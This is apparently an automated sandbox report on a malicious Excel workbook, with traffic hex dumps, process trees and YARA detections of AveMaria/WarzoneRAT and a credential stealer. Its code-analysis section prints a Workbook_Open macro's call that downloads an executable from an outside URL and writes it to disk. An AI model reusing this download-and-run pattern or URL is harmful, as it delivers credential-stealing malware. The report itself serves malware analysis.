                                              2024-12-12 20:45:44 UTC16384INData Raw: cc 19 92 28 da 44 ce 2a 22 0b ec 77 40 8d 02 cf 13 13 6f 96 d0 15 5f f2 9f 7f b2 39 c3 c9 9b 0a c6 02 4a 7f c5 87 a3 5d 14 0a bd 30 f8 cc b7 01 c4 05 da 52 b7 bc 18 bb da c6 fa 7d 4c bd f1 b4 23 a0 54 85 91 19 f0 01 4a ff c3 6d 93 b8 a5 e4 cd 6c 3a d1 fe c0 a9 a7 36 a8 5c 5d 28 32 58 81 11 2c 1b a0 27 29 13 b4 f3 0a 16 46 59 b4 00 e6 21 ff 56 2b 30 d6 30 e2 86 3d 8d 35 30 e8 38 13 e0 5b 2e 8c 40 e2 28 e8 eb 3f 1f 2d a7 c3 f6 ca 55 34 ce c9 af 3f e6 3b 13 d2 b9 45 e6 f1 26 75 fa 34 d0 d5 3a 1c 20 5e 59 34 fa 73 a5 34 89 8c 99 5d 2c 0b 99 5a 13 53 55 06 1d 9b bf 39 ee 46 8d 9f f9 7e af 6c fb 61 d0 3d 40 9f b7 bb 64 a5 03 ff 6a 9a a5 1a a2 1f 28 74 b4 1b 5f 21 b8 91 7f 58 92 e3 d9 4b 91 11 8e ba 3d 75 62 45 dc a6 08 c4 b6 5e 07 3f d6 d5 78 7c 52 17 87 2f 24
                                              Data Ascii: (D*"w@o_9J]0R}L#TJml:6\](2X,')FY!V+00=508[.@(?-U4?;E&u4: ^Y4s4],ZSU9F~la=@dj(t_!XK=ubE^?x|R/$
                                              2024-12-12 20:45:44 UTC16384INData Raw: e3 fd 92 0c c9 41 29 59 f5 fa d7 72 f2 75 be 0a 19 b5 eb a2 96 03 f9 6a 31 cc e9 52 25 59 54 52 5a b3 64 b6 c2 f3 9b 9f 48 10 ab 83 21 a6 7a ce 66 18 3e be 4c fc 32 31 0a e4 37 a7 be 59 e6 2d 20 60 eb a8 dd 13 66 cb 01 3c f3 86 82 9d 2e 30 4c 07 83 39 bd e3 fb df 17 86 ca 95 67 61 32 7c d7 89 4b b8 aa a7 e6 d0 ea 59 e2 22 29 66 e8 cc 26 ab 3b 20 a6 58 0d d9 5c fa 79 af cf 1d fb c7 c5 d7 08 5f 17 f1 b5 18 de a3 55 ea c7 53 9d b0 24 22 7f ff 68 c3 80 37 9c fc 8f b8 04 9d 05 dc 98 6a 73 c3 1a 44 49 cf f9 ff 04 65 b2 9f db 5b 57 81 fe 6f a6 9e 9d 40 e0 d4 22 03 98 c2 7b 18 e0 68 25 f6 3a 9c 32 95 75 a2 99 39 ba fd de b6 8a 9f 0b e3 1f 22 cc 65 4b fc 01 bc 2b 3a a9 52 15 b0 7d 70 16 25 7f a0 49 58 78 71 d2 b9 58 71 e6 d5 ba a0 a3 18 d3 4f d5 f4 6f dd 9a 24 0a
                                              Data Ascii: A)Yruj1R%YTRZdH!zf>L217Y- `f<.0L9ga2|KY")f&; X\y_US$"h7jsDIe[Wo@"{h%:2u9"eK+:R}p%IXxqXqOo$
                                              2024-12-12 20:45:44 UTC16384INData Raw: ac cb 06 6b 01 ce c9 4e e4 47 a6 ba 82 9a dc dc 21 1a 60 c4 7b 03 ad 44 30 3c 65 be 20 f6 79 28 eb ec 8f 4e 77 a1 32 67 e0 ed 9c ca b0 26 b8 d2 c7 5d d0 19 e5 9b ef 95 a9 7a 38 69 f4 da 1c f1 72 f0 5e 60 01 f7 85 79 17 9c 48 65 e9 f0 a9 0b ba d4 24 ba 83 c9 d8 f4 f3 ff fd ef 68 1c 3f 3a c7 a9 87 38 20 c7 68 55 6a e4 b1 8c d1 c3 3a 1f 2b 2f cb 0d 66 1d 6a e4 0d 4c 9a 62 a0 cc a7 b3 1f 53 d2 5d ba eb 16 9d e5 a3 f8 1a b9 7e 5f c2 42 51 a6 22 56 5f e0 d5 f6 64 ef c0 ab 11 38 30 2d de f3 2f e2 80 c9 46 1d 53 fe 23 c4 84 4b fe 5f 0e 40 79 79 d5 6b ad 31 da c3 00 15 19 bc 8c d5 bd 73 48 b9 2d 8b 89 a5 92 cd a4 01 97 4a 02 1d b9 e4 63 65 16 91 fc 2f 3c 8d 36 b5 95 16 76 37 1e d4 21 cf 47 cb 77 92 01 e5 88 29 cd 19 82 38 da 97 f7 e8 04 fc c5 23 08 7a 67 fe 55 77
                                              Data Ascii: kNG!`{D0<e y(Nw2g&]z8ir^`yHe$h?:8 hUj:+/fjLbS]~_BQ"V_d80-/FS#K_@yyk1sH-Jce/<6v7!Gw)8#zgUw


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:15:45:36
                                              Start date:12/12/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13fb10000
                                              File size:28'253'536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:4
                                              Start time:15:45:43
                                              Start date:12/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe"
                                              Imagebase:0xb70000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:15:45:44
                                              Start date:12/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                                              Imagebase:0xb70000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:15:45:44
                                              Start date:12/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                                              Imagebase:0xb70000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000006.00000002.374015317.000000000054F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: AveMaria_WarZone, Description: unknown, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:15:45:46
                                              Start date:12/12/2024
                                              Path:C:\ProgramData\msimages.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\ProgramData\msimages.exe"
                                              Imagebase:0x1170000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:15:45:47
                                              Start date:12/12/2024
                                              Path:C:\ProgramData\msimages.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\ProgramData\msimages.exe
                                              Imagebase:0x1170000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:13
                                              Start time:15:45:47
                                              Start date:12/12/2024
                                              Path:C:\ProgramData\msimages.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\ProgramData\msimages.exe
                                              Imagebase:0x1170000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:15:45:58
                                              Start date:12/12/2024
                                              Path:C:\ProgramData\msimages.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\ProgramData\msimages.exe"
                                              Imagebase:0x1170000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:15:45:59
                                              Start date:12/12/2024
                                              Path:C:\ProgramData\msimages.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\ProgramData\msimages.exe
                                              Imagebase:0x1170000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:15:45:59
                                              Start date:12/12/2024
                                              Path:C:\ProgramData\msimages.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\ProgramData\msimages.exe
                                              Imagebase:0x1170000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Disassembly

                                              Code Analysis

                                              Call Graph

                                              Module: Module1

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Module1"

                                              Non-Executed Functions

                                              Subroutine

                                              bookAPIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

                                              LineInstructionMeta Information
                                              2

                                              Sub book()

                                              4

                                              End Sub

                                              Module: Sheet1

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet1"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: Sheet2

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet2"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: Sheet3

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet3"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: ThisWorkbook

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "ThisWorkbook"

                                              2

                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Executed Functions

                                              Subroutine

                                              Workbook_OpenAPIs: 26, Strings: 9, Number of lines: 32, Relevance: 100.032

                                              APIsMeta Information

                                              Chr

                                              CreateObject

                                              		CreateObject("WScript.Shell")

                                              SpecialFolders

                                              CreateObject

                                              		CreateObject("microsoft.xmlhttp")

                                              CreateObject

                                              		CreateObject("Shell.Application")

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Len

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: InStr

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Mid

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Mid

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Mid

                                              Open

                                              		IXMLHTTPRequest.Open("get","https://www.stipamana.com/sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe",False)

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Len

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: InStr

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Mid

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Mid

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Mid

                                              send

                                              responseBody

                                              Status

                                              		IXMLHTTPRequest.Status() -> 200

                                              CreateObject

                                              		CreateObject("adodb.stream")

                                              Open

                                              		Stream.Open()

                                              Type

                                              Write

                                              		Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdAc\x0b?\x04?\x00\x00\x00?\x04 \x00?\x04\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x04?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x04O\x00?\x04?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x04\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x04 \x00?\x04?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x04?\x00?\x04\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x04?\x00?\x04\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x04\x00\x00H\x00\x02\x05?\x04?\x00\x03\x00\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00????????????????\x1e???????????????????????????????????????????????????????????????????????????????????????????+???????????????\xfffd\x17??????????????????????????????????????????????????????????????????????????-??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????i?????????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????\xfffd??????????????????????????????????????????????????????R????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????S?????????????I??????????????????????????????????????????????????u<???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????'?????????????????????????????????????????????????H????????????????????????+?????????????????????a??????+????????????L????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????E????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U???????????????????<??????????????????????????????????????????????????????????????????????????????S??????????????????????????????????????????????r????????????I????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????&??????????????????????????????????????????/????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\????????????????????????????????t???????.??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????^???????????????????????????????????????????????????????????????????????????????????????????????\xfffd?????????????????s???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????e?????????????????????????????????????????????????????????????????????????????????????i?????????????????????????????????????????????J????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd?????????????????????H???????????????????????????????????????????????????????[?????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????